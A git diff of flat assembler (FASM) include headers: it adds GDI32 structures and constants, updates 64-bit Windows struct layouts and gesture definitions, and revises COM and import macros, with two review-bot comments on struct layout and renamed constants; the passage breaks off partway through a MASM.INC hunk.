@@ -0,0 +1,480 @@ + +; GDI32.DLL structures and constants + +struct SIZE + cx dd ? + cy dd ? +ends + +struct BITMAP + bmType dd ? + bmWidth dd ? + bmHeight dd ? + bmWidthBytes dd ? + bmPlanes dw ? + bmBitsPixel dw ?,?,? + bmBits dq ? +ends + +struct BITMAPCOREHEADER + bcSize dd ? + bcWidth dw ? + bcHeight dw ? + bcPlanes dw ? + bcBitCount dw ? +ends + +struct BITMAPINFOHEADER + biSize dd ? + biWidth dd ? + biHeight dd ? + biPlanes dw ? + biBitCount dw ? + biCompression dd ? + biSizeImage dd ? + biXPelsPerMeter dd ? + biYPelsPerMeter dd ? + biClrUsed dd ? + biClrImportant dd ? +ends + +struct BITMAPFILEHEADER + bfType dw ? + bfSize dd ? + bfReserved1 dw ? + bfReserved2 dw ? + bfOffBits dd ? +ends + +struct TEXTMETRIC + tmHeight dd ? + tmAscent dd ? + tmDescent dd ? + tmInternalLeading dd ? + tmExternalLeading dd ? + tmAveCharWidth dd ? + tmMaxCharWidth dd ? + tmWeight dd ? + tmOverhang dd ? + tmDigitizedAspectX dd ? + tmDigitizedAspectY dd ? + tmFirstChar TCHAR ? + tmLastChar TCHAR ? + tmDefaultChar TCHAR ? + tmBreakChar TCHAR ? + tmItalic db ? + tmUnderlined db ? + tmStruckOut db ? + tmPitchAndFamily db ? + tmCharSet db ? +ends + +struct LOGBRUSH + lbStyle dd ? + lbColor dd ? + lbHatch dd ? +ends + +struct LOGPEN + lopnStyle dd ? + lopnWidth POINT + lopnColor dd ? +ends + +struct EXTLOGPEN + elpPenStyle dd ? + elpWidth dd ? + elpBrushStyle dd ? + elpColor dd ? + elpHatch dd ? + elpNumEntries dd ? + elpStyleEntry dd ? +ends + +struct LOGFONT + lfHeight dd ? + lfWidth dd ? + lfEscapement dd ? + lfOrientation dd ? + lfWeight dd ? + lfItalic db ? + lfUnderline db ? + lfStrikeOut db ? + lfCharSet db ? + lfOutPrecision db ? + lfClipPrecision db ? + lfQuality db ? + lfPitchAndFamily db ? + lfFaceName TCHAR 32 dup (?) +ends + +struct ENUMLOGFONT + elfLogFont LOGFONT + elfFullName TCHAR 64 dup (?) + elfStyle TCHAR 32 dup (?) +ends + +struct ENUMLOGFONTEX + elfLogFont LOGFONT + elfFullName TCHAR 64 dup (?) + elfStyle TCHAR 32 dup (?) + elfScript TCHAR 32 dup (?) 
+ends + +struct PIXELFORMATDESCRIPTOR + nSize dw ? + nVersion dw ? + dwFlags dd ? + iPixelType db ? + cColorBits db ? + cRedBits db ? + cRedShift db ? + cGreenBits db ? + cGreenShift db ? + cBlueBits db ? + cBlueShift db ? + cAlphaBits db ? + cAlphaShift db ? + cAccumBits db ? + cAccumRedBits db ? + cAccumGreenBits db ? + cAccumBlueBits db ? + cAccumAlphaBits db ? + cDepthBits db ? + cStencilBits db ? + cAuxBuffers db ? + iLayerType db ? + bReserved db ? + dwLayerMask dd ? + dwVisibleMask dd ? + dwDamageMask dd ? +ends + +struct TRIVERTEX + x dd ? + y dd ? + Red dw ? + Green dw ? + Blue dw ? + Alpha dw ? +ends + +; General constants + +GDI_ERROR = 0FFFFFFFFh +HGDI_ERROR = 0FFFFFFFFh + +; Binary raster operations + +R2_BLACK = 1 +R2_NOTMERGEPEN = 2 +R2_MASKNOTPEN = 3 +R2_NOTCOPYPEN = 4 +R2_MASKPENNOT = 5 +R2_NOT = 6 +R2_XORPEN = 7 +R2_NOTMASKPEN = 8 +R2_MASKPEN = 9 +R2_NOTXORPEN = 10 +R2_NOP = 11 +R2_MERGENOTPEN = 12 +R2_COPYPEN = 13 +R2_MERGEPENNOT = 14 +R2_MERGEPEN = 15 +R2_WHITE = 16 + +; Raster operations + +SRCCOPY = 00CC0020h +SRCPAINT = 00EE0086h +SRCAND = 008800C6h +SRCINVERT = 00660046h +SRCERASE = 00440328h +NOTSRCCOPY = 00330008h +NOTSRCERASE = 001100A6h +MERGECOPY = 00C000CAh +MERGEPAINT = 00BB0226h +PATCOPY = 00F00021h +PATPAINT = 00FB0A09h +PATINVERT = 005A0049h +DSTINVERT = 00550009h +BLACKNESS = 00000042h +WHITENESS = 00FF0062h + +; Region flags + +ERROR = 0 +NULLREGION = 1 +SIMPLEREGION = 2 +COMPLEXREGION = 3 + +; CombineRgn styles + +RGN_AND = 1 +RGN_OR = 2 +RGN_XOR = 3 +RGN_DIFF = 4 +RGN_COPY = 5 + +; StretchBlt modes + +BLACKONWHITE = 1 +WHITEONBLACK = 2 +COLORONCOLOR = 3 +HALFTONE = 4 +STRETCH_ANDSCANS = BLACKONWHITE +STRETCH_ORSCANS = WHITEONBLACK +STRETCH_DELETESCANS = COLORONCOLOR +STRETCH_HALFTONE = HALFTONE + +; PolyFill modes + +ALTERNATE = 1 +WINDING = 2 + +; Background modes + +TRANSPARENT = 1 +OPAQUE = 2 + +; Point types + +PT_CLOSEFIGURE = 1 +PT_LINETO = 2 +PT_BEZIERTO = 4 +PT_MOVETO = 6 + +; Mapping modes + +MM_TEXT = 1 +MM_LOMETRIC = 
2 +MM_HIMETRIC = 3 +MM_LOENGLISH = 4 +MM_HIENGLISH = 5 +MM_TWIPS = 6 +MM_ISOTROPIC = 7 +MM_ANISOTROPIC = 8 + +; Coordinate modes + +ABSOLUTE = 1 +RELATIVE = 2 + +; Stock logical objects + +WHITE_BRUSH = 0 +LTGRAY_BRUSH = 1 +GRAY_BRUSH = 2 +DKGRAY_BRUSH = 3 +BLACK_BRUSH = 4 +NULL_BRUSH = 5 +HOLLOW_BRUSH = NULL_BRUSH +WHITE_PEN = 6 +BLACK_PEN = 7 +NULL_PEN = 8 +OEM_FIXED_FONT = 10 +ANSI_FIXED_FONT = 11 +ANSI_VAR_FONT = 12 +SYSTEM_FONT = 13 +DEVICE_DEFAULT_FONT = 14 +DEFAULT_PALETTE = 15 +SYSTEM_FIXED_FONT = 16 +DEFAULT_GUI_FONT = 17 + +; Brush styles + +BS_SOLID = 0 +BS_NULL = 1 +BS_HOLLOW = BS_NULL +BS_HATCHED = 2 +BS_PATTERN = 3 +BS_INDEXED = 4 +BS_DIBPATTERN = 5 +BS_DIBPATTERNPT = 6 +BS_PATTERN8X8 = 7 +BS_DIBPATTERN8X8 = 8 +BS_MONOPATTERN = 9 + +; Hatch styles + +HS_HORIZONTAL = 0 +HS_VERTICAL = 1 +HS_FDIAGONAL = 2 +HS_BDIAGONAL = 3 +HS_CROSS = 4 +HS_DIAGCROSS = 5 + +; Pen styles + +PS_SOLID = 0 +PS_DASH = 1 +PS_DOT = 2 +PS_DASHDOT = 3 +PS_DASHDOTDOT = 4 +PS_NULL = 5 +PS_INSIDEFRAME = 6 +PS_USERSTYLE = 7 +PS_ALTERNATE = 8 +PS_ENDCAP_ROUND = 0 +PS_ENDCAP_SQUARE = 100h +PS_ENDCAP_FLAT = 200h +PS_JOIN_ROUND = 0 +PS_JOIN_BEVEL = 1000h +PS_JOIN_MITER = 2000h +PS_COSMETIC = 0 +PS_GEOMETRIC = 010000h + +; Arc directions + +AD_COUNTERCLOCKWISE = 1 +AD_CLOCKWISE = 2 + +; Text alignment options + +TA_NOUPDATECP = 0 +TA_UPDATECP = 1 +TA_LEFT = 0 +TA_RIGHT = 2 +TA_CENTER = 6 +TA_TOP = 0 +TA_BOTTOM = 8 +TA_BASELINE = 24 +TA_RTLREADING = 100h +VTA_BASELINE = TA_BASELINE +VTA_LEFT = TA_BOTTOM +VTA_RIGHT = TA_TOP +VTA_CENTER = TA_CENTER +VTA_BOTTOM = TA_RIGHT +VTA_TOP = TA_LEFT + +; ExtTextOut options + +ETO_OPAQUE = 0002h +ETO_CLIPPED = 0004h +ETO_GLYPH_INDEX = 0010h +ETO_RTLREADING = 0080h +ETO_IGNORELANGUAGE = 1000h + +; Bitmap compression types + +BI_RGB = 0 +BI_RLE8 = 1 +BI_RLE4 = 2 +BI_BITFIELDS = 3 + +; tmPitchAndFamily flags + +TMPF_FIXED_PITCH = 1 +TMPF_VECTOR = 2 +TMPF_TRUETYPE = 4 +TMPF_DEVICE = 8 + +; Font output precision values + +OUT_DEFAULT_PRECIS = 0 
+OUT_STRING_PRECIS = 1 +OUT_CHARACTER_PRECIS = 2 +OUT_STROKE_PRECIS = 3 +OUT_TT_PRECIS = 4 +OUT_DEVICE_PRECIS = 5 +OUT_RASTER_PRECIS = 6 +OUT_TT_ONLY_PRECIS = 7 +OUT_OUTLINE_PRECIS = 8 +OUT_SCREEN_OUTLINE_PRECIS = 9 + +; Font clipping precision values + +CLIP_DEFAULT_PRECIS = 0 +CLIP_CHARACTER_PRECIS = 1 +CLIP_STROKE_PRECIS = 2 +CLIP_LH_ANGLES = 10h +CLIP_TT_ALWAYS = 20h +CLIP_EMBEDDED = 80h + +; Font output quality values + +DEFAULT_QUALITY = 0 +DRAFT_QUALITY = 1 +PROOF_QUALITY = 2 +NONANTIALIASED_QUALITY = 3 +ANTIALIASED_QUALITY = 4 + +; Font pitch values + +DEFAULT_PITCH = 0 +FIXED_PITCH = 1 +VARIABLE_PITCH = 2 +MONO_FONT = 8 + +; Font families + +FF_DONTCARE = 00h +FF_ROMAN = 10h +FF_SWISS = 20h +FF_MODERN = 30h +FF_SCRIPT = 40h +FF_DECORATIVE = 50h + +; Font weights + +FW_DONTCARE = 0 +FW_THIN = 100 +FW_EXTRALIGHT = 200 +FW_LIGHT = 300 +FW_NORMAL = 400 +FW_MEDIUM = 500 +FW_SEMIBOLD = 600 +FW_BOLD = 700 +FW_EXTRABOLD = 800 +FW_HEAVY = 900 +FW_ULTRALIGHT = FW_EXTRALIGHT +FW_REGULAR = FW_NORMAL +FW_DEMIBOLD = FW_SEMIBOLD +FW_ULTRABOLD = FW_EXTRABOLD +FW_BLACK = FW_HEAVY + +; Character set values + +ANSI_CHARSET = 0 +DEFAULT_CHARSET = 1 +SYMBOL_CHARSET = 2 +SHIFTJIS_CHARSET = 128 +HANGEUL_CHARSET = 129 +GB2312_CHARSET = 134 +CHINESEBIG5_CHARSET = 136 +OEM_CHARSET = 255 +JOHAB_CHARSET = 130 +HEBREW_CHARSET = 177 +ARABIC_CHARSET = 178 +GREEK_CHARSET = 161 +TURKISH_CHARSET = 162 +VIETNAMESE_CHARSET = 163 +THAI_CHARSET = 222 +EASTEUROPE_CHARSET = 238 +RUSSIAN_CHARSET = 204 +MAC_CHARSET = 77 +BALTIC_CHARSET = 186 + +; Pixel format constants + +PFD_TYPE_RGBA = 0 +PFD_TYPE_COLORINDEX = 1 +PFD_MAIN_PLANE = 0 +PFD_OVERLAY_PLANE = 1 +PFD_UNDERLAY_PLANE = -1 +PFD_DOUBLEBUFFER = 1 +PFD_STEREO = 2 +PFD_DRAW_TO_WINDOW = 4 +PFD_DRAW_TO_BITMAP = 8 +PFD_SUPPORT_GDI = 10h +PFD_SUPPORT_OPENGL = 20h +PFD_GENERIC_FORMAT = 40h +PFD_NEED_PALETTE = 80h +PFD_NEED_SYSTEM_PALETTE = 100h +PFD_SWAP_EXCHANGE = 200h +PFD_SWAP_COPY = 400h +PFD_SWAP_LAYER_BUFFERS = 800h +PFD_GENERIC_ACCELERATED = 
1000h +PFD_DEPTH_DONTCARE = 20000000h +PFD_DOUBLEBUFFER_DONTCARE = 40000000h +PFD_STEREO_DONTCARE = 80000000h diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC old mode 100644 new mode 100755 similarity index 96% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC index e935de5..b043e1e --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL32.INC @@ -43,7 +43,7 @@ struct OSVERSIONINFOW ends struct MEMORYSTATUS - dwiLength dd ? + dwLength dd ? dwMemoryLoad dd ? dwTotalPhys dd ? dwAvailPhys dd ? diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC old mode 100644 new mode 100755 similarity index 95% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC index f08b04a..3e05b24 --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/KERNEL64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/KERNEL64.INC @@ -7,7 +7,7 @@ struct SYSTEM_INFO dwPageSize dd ? lpMinimumApplicationAddress dq ? lpMaximumApplicationAddress dq ? - dwActiveProcessorMask dd ? + dwActiveProcessorMask dq ? dwNumberOfProcessors dd ? dwProcessorType dd ? dwAllocationGranularity dd ? @@ -43,14 +43,14 @@ struct OSVERSIONINFOW ends struct MEMORYSTATUS - dwiLength dd ? + dwLength dd ? dwMemoryLoad dd ? - dwTotalPhys dd ? - dwAvailPhys dd ? - dwTotalPageFile dd ? - dwAvailPageFile dd ? - dwTotalVirtual dd ? - dwAvailVirtual dd ? + dwTotalPhys dq ? + dwAvailPhys dq ? + dwTotalPageFile dq ? + dwAvailPageFile dq ? + dwTotalVirtual dq ? + dwAvailVirtual dq ? ends struct STARTUPINFO 
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL64.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/SHELL64.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/SHELL64.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC old mode 100644 new mode 100755 similarity index 92% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC index a8bfc65..37b7ff1 --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER32.INC @@ -6,6 +6,11 @@ struct POINT y dd ? ends +struct POINTS + x dw ? + y dw ? +ends + struct RECT left dd ? top dd ? @@ -202,6 +207,24 @@ struct MSGBOXPARAMS dwLanguageId dd ? ends +struct GESTURECONFIG + dwID dd ? + dwWant dd ? + dwBlock dd ? +ends + +struct GESTUREINFO + cbSize dd ? + dwFlags dd ? + dwID dd ? + hwndTarget dd ? + ptsLocation POINTS + dwInstanceID dd ? + dwSequenceID dd ?,? + ullArguments dq ? + cbExtraArgs dd ?,? +ends + ; MessageBox type flags MB_OK = 000000h @@ -514,6 +537,8 @@ WM_HSCROLL = 0114h WM_VSCROLL = 0115h WM_INITMENU = 0116h WM_INITMENUPOPUP = 0117h +WM_GESTURE = 0119h +WM_GESTURENOTIFY = 011Ah WM_MENUSELECT = 011Fh WM_MENUCHAR = 0120h WM_ENTERIDLE = 0121h 
@@ -1864,3 +1889,45 @@ SPI_SETWORKAREA = 47 SPIF_UPDATEINIFILE = 1 SPIF_SENDWININICHANGE = 2 + +; Gesture Information Flags + +GF_BEGIN = 1 +GF_INERTIA = 2 +GF_END = 4 + +; Gesture IDs + +GID_BEGIN = 1 +GID_END = 2 +GID_ZOOM = 3 +GID_PAN = 4 +GID_ROTATE = 5 +GID_TWOFINGERTAP = 6 +GID_PRESSANDTAP = 7 +GID_ROLLOVER = GID_PRESSANDTAP + +; Zoom Gesture Confiration Flags + +GC_ZOOM = 0x00000001 + +; Pan Gesture Configuration Flags + +GC_PAN = 0x00000001 +GC_PAN_WITH_SINGLE_FINGER_VERTICALLY = 0x00000002 +GC_PAN_WITH_SINGLE_FINGER_HORIZONTALLY = 0x00000004 +GC_PAN_WITH_GUTTER = 0x00000008 +GC_PAN_WITH_INERTIA = 0x00000010 + +; Rotate Gesture Configuration Flags + +GC_ROTATE = 0x00000001 + +; Two finger tap configuration flags + +GC_TWOFINGERTAP = 0x00000001 + +; Press and tap Configuration Flags + +GC_PRESSANDTAP = 0x00000001 +GC_ROLLOVER = GC_PRESSANDTAP diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC old mode 100644 new mode 100755 similarity index 91% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC index 4fe2cd1..7ff7600 --- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/USER64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/USER64.INC @@ -6,6 +6,11 @@ struct POINT y dd ? ends +struct POINTS + x dw ? + y dw ? +ends + struct RECT left dd ? top dd ? @@ -111,8 +116,8 @@ struct WINDOWPLACEMENT ends struct WINDOWPOS - hwnd dd ? - hwndInsertAfter dd ? + hwnd dq ? + hwndInsertAfter dq ? x dd ? y dd ? cx dd ? @@ -122,8 +127,8 @@ ends struct NMHDR hwndFrom dq ? - idFrom dd ? - code dd ? + idFrom dq ? + code dd ?,? ends struct COPYDATASTRUCT 
@@ -168,16 +173,18 @@ struct DRAWITEMSTRUCT ends struct MENUITEMINFO - cbSize dd ? - fMask dd ? - fType dd ? - fState dd ? - wID dd ?,? - hSubMenu dq ? - hbmpChecked dq ? - hbmpUnchecked dq ? - dwItemData dd ? - dwTypeData dd ? + cbSize dd ? + fMask dd ? + fType dd ? + fState dd ? + wID dd ?,? + hSubMenu dq ? + hbmpChecked dq ? + hbmpUnchecked dq ? + dwItemData dq ? + dwTypeData dq ? + cch dd ?,? + hbmpItem dq ? ends struct MEASUREITEMSTRUCT @@ -186,7 +193,7 @@ struct MEASUREITEMSTRUCT itemID dd ? itemWidth dd ? itemHeight dd ? - itemData dd ? + itemData dq ? ends struct MSGBOXPARAMS @@ -202,6 +209,24 @@ struct MSGBOXPARAMS dwLanguageId dd ?,? ends +struct GESTURECONFIG + dwID dd ? + dwWant dd ? + dwBlock dd ? +ends + +struct GESTUREINFO + cbSize dd ? + dwFlags dd ? + dwID dd ? + hwndTarget dd ? + ptsLocation POINTS + dwInstanceID dd ? + dwSequenceID dd ?,? + ullArguments dq ? + cbExtraArgs dd ?,? +ends + ; MessageBox type flags MB_OK = 000000h @@ -514,6 +539,8 @@ WM_HSCROLL = 0114h WM_VSCROLL = 0115h WM_INITMENU = 0116h WM_INITMENUPOPUP = 0117h +WM_GESTURE = 0119h +WM_GESTURENOTIFY = 011Ah WM_MENUSELECT = 011Fh WM_MENUCHAR = 0120h WM_ENTERIDLE = 0121h @@ -831,16 +858,16 @@ DLGWINDOWEXTRA = 30 ; GetWindowLong offsets -GWL_WNDPROC = -4 -GWL_HINSTANCE = -6 -GWL_HWNDPARENT = -8 -GWL_STYLE = -16 -GWL_EXSTYLE = -20 -GWL_USERDATA = -21 -GWL_ID = -12 -DWL_MSGRESULT = 0 -DWL_DLGPROC = 4 -DWL_USER = 8 +GWLP_WNDPROC = -4 +GWLP_HINSTANCE = -6 +GWLP_HWNDPARENT = -8 +GWLP_ID = -12 +GWLP_STYLE = -16 +GWLP_EXSTYLE = -20 +GWLP_USERDATA = -21 +DWLP_MSGRESULT = 0 +DWLP_DLGPROC = 8 +DWLP_USER = 16 ; GetSystemMetrics codes 
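Review bot: In the GESTUREINFO struct added to the 64-bit header, `hwndTarget dd ?` keeps the window handle at four bytes, while the handle fields this same commit touches elsewhere in USER64.INC (WINDOWPOS `hwnd`/`hwndInsertAfter`, NMHDR `idFrom`) are widened to `dq`. HWND is pointer-sized on Win64, so this definition presumably does not match the SDK layout, and the offsets of every field after it would be off for 64-bit callers; the 32-bit copy in USER32.INC is unaffected. If the SDK layout confirms it, the field should be `hwndTarget dq ?` with `dwID dd ?,?` padding it to 8-byte alignment, which shifts ptsLocation and the fields that follow. Verify the total size against the SDK before changing it.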
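Review bot: The GetWindowLong offsets hunk replaces the GWL_*/DWL_* names with GWLP_*/DWLP_* outright rather than adding the new names alongside them, so any 64-bit source that still references GWL_STYLE or GWL_EXSTYLE stops assembling after this commit. Since those two names are still valid on 64-bit Windows, consider keeping them as aliases, `GWL_STYLE = GWLP_STYLE` and `GWL_EXSTYLE = GWLP_EXSTYLE`, after the new definitions.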
@@ -1864,3 +1891,45 @@ SPI_SETWORKAREA = 47 SPIF_UPDATEINIFILE = 1 SPIF_SENDWININICHANGE = 2 + +; Gesture Information Flags + +GF_BEGIN = 1 +GF_INERTIA = 2 +GF_END = 4 + +; Gesture IDs + +GID_BEGIN = 1 +GID_END = 2 +GID_ZOOM = 3 +GID_PAN = 4 +GID_ROTATE = 5 +GID_TWOFINGERTAP = 6 +GID_PRESSANDTAP = 7 +GID_ROLLOVER = GID_PRESSANDTAP + +; Zoom Gesture Confiration Flags + +GC_ZOOM = 0x00000001 + +; Pan Gesture Configuration Flags + +GC_PAN = 0x00000001 +GC_PAN_WITH_SINGLE_FINGER_VERTICALLY = 0x00000002 +GC_PAN_WITH_SINGLE_FINGER_HORIZONTALLY = 0x00000004 +GC_PAN_WITH_GUTTER = 0x00000008 +GC_PAN_WITH_INERTIA = 0x00000010 + +; Rotate Gesture Configuration Flags + +GC_ROTATE = 0x00000001 + +; Two finger tap configuration flags + +GC_TWOFINGERTAP = 0x00000001 + +; Press and tap Configuration Flags + +GC_PRESSANDTAP = 0x00000001 +GC_ROLLOVER = GC_PRESSANDTAP diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/WSOCK32.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/WSOCK32.INC rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/WSOCK32.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC old mode 100644 new mode 100755 similarity index 63% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC index c73fdf7..318749c --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM32.INC @@ -8,10 +8,7 @@ macro cominvk object,proc,[arg] pushd arg common end if - if ~ defined com.object.#object - display 'Error: not a COM object.',0Dh,0Ah - rb -1 - end if + assert defined object#.com.object ; must be a COM object mov eax,[object] push eax mov eax,[eax] 
@@ -24,10 +21,7 @@ macro comcall handle,interface,proc,[arg] pushd arg common end if - if ~ defined com.interface.#interface - display 'Error: not a COM interface.',0Dh,0Ah - rb -1 - end if + assert defined interface#.com.interface ; must be a COM interface if handle eqtype eax | handle eqtype 0 push handle local ..handle @@ -43,18 +37,17 @@ macro comcall handle,interface,proc,[arg] macro interface name,[proc] { common struc name \{ - match any, fields@struct \\{ fields@struct equ fields@struct,.,name, \\} - match , fields@struct \\{ . dd ? + match , @struct \\{ define field@struct .,name, \\} + match no, @struct \\{ . dd ? virtual at 0 forward .#proc dd ? common - com.object.\#. = com.interface.#name + .\#\\.com.object = name#.com.interface end virtual \\} \} virtual at 0 forward name#.#proc dd ? common - com.interface.#name = $ shr 2 + name#.com.interface = $ shr 2 end virtual } - diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC old mode 100644 new mode 100755 similarity index 58% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC index 93861cd..60ef71e --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/COM64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/COM64.INC 
@@ -3,26 +3,19 @@ macro cominvk object,proc,[arg] { common - if ~ defined com.object.#object - display 'Error: not a COM object.',0Dh,0Ah - rb -1 - end if + assert defined object#.com.object ; must be a COM object macro call dummy \{ mov rax,[object] mov rax,[rax] call [rax+object#.#proc] \} - fastcall proc,[object],arg + fastcall ,[object],arg purge call } macro comcall handle,interface,proc,[arg] { common - if ~ defined com.interface.#interface - display 'Error: not a COM interface.',0Dh,0Ah - rb -1 - end if + assert defined interface#.com.interface ; must be a COM interface macro call dummy \{ if handle eqtype rax | handle eqtype 0 - push handle local ..handle label ..handle at handle mov rax,[..handle] @@ -31,24 +24,24 @@ macro comcall handle,interface,proc,[arg] mov rax,[rax] end if call [rax+interface#.#proc] \} - fastcall proc,handle,arg + fastcall ,handle,arg purge call } macro interface name,[proc] { common struc name \{ - match any, fields@struct \\{ fields@struct equ fields@struct,.,name, \\} - match , fields@struct \\{ . dq ? + match , @struct \\{ define field@struct .,name, \\} + match no, @struct \\{ . dq ? virtual at 0 forward .#proc dq ? common - com.object.\#. = com.interface.#name + .\#\\.com.object = name#.com.interface end virtual \\} \} virtual at 0 forward name#.#proc dq ? common - com.interface.#name = $ shr 2 + name#.com.interface = $ shr 3 end virtual } diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/EXPORT.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/EXPORT.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/EXPORT.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/EXPORT.INC 
diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IF.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IF.INC old mode 100644 new mode 100755 similarity index 100% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IF.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IF.INC diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC old mode 100644 new mode 100755 similarity index 91% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC index 2c40e72..e6369a4 --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT32.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT32.INC @@ -2,7 +2,9 @@ ; Macroinstructions for making import section macro library [name,string] - { forward + { common + import.data: + forward local _label if defined name#.redundant if ~ name#.redundant diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC old mode 100644 new mode 100755 similarity index 92% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC index 9ed6d94..7fd24bd --- a/binary/hyperion/source/Fasm/fasminclude/MACRO/IMPORT64.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/IMPORT64.INC @@ -2,7 +2,9 @@ ; Macroinstructions for making import section (64-bit) macro library [name,string] - { forward + { common + import.data: + forward local _label if defined name#.redundant if ~ name#.redundant diff --git a/binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC b/binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC old mode 100644 new mode 100755 similarity index 69% rename from binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC rename to binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC index ace7dbf..a77fdde 
--- a/binary/hyperion/source/Fasm/fasminclude/MACRO/MASM.INC +++ b/binary/hyperion/source/Fasm/INCLUDE/MACRO/MASM.INC @@ -31,13 +31,15 @@ macro assume params macro label . \\{ local def define def . match =reg =at label, def \\\{ define def \\\} - match any,def \\\{ def@assumed reg,.,: \\\} \\} - struc db [val] \\{ \common def@assumed reg,.,db val \\} - struc dw [val] \\{ \common def@assumed reg,.,dw val \\} - struc dp [val] \\{ \common def@assumed reg,.,dp val \\} - struc dd [val] \\{ \common def@assumed reg,.,dd val \\} - struc dt [val] \\{ \common def@assumed reg,.,dt val \\} - struc dq [val] \\{ \common def@assumed reg,.,dq val \\} + match name at,def \\\{ def@assumed reg,name,label at + define def \\\} + match name,def \\\{ def@assumed reg,.,: \\\} \\} + struc db [val] \\{ \common def@assumed reg,., \\} + struc dw [val] \\{ \common def@assumed reg,., \\} + struc dp [val] \\{ \common def@assumed reg,., \\} + struc dd [val] \\{ \common def@assumed reg,.,
\\} + struc dt [val] \\{ \common def@assumed reg,.,
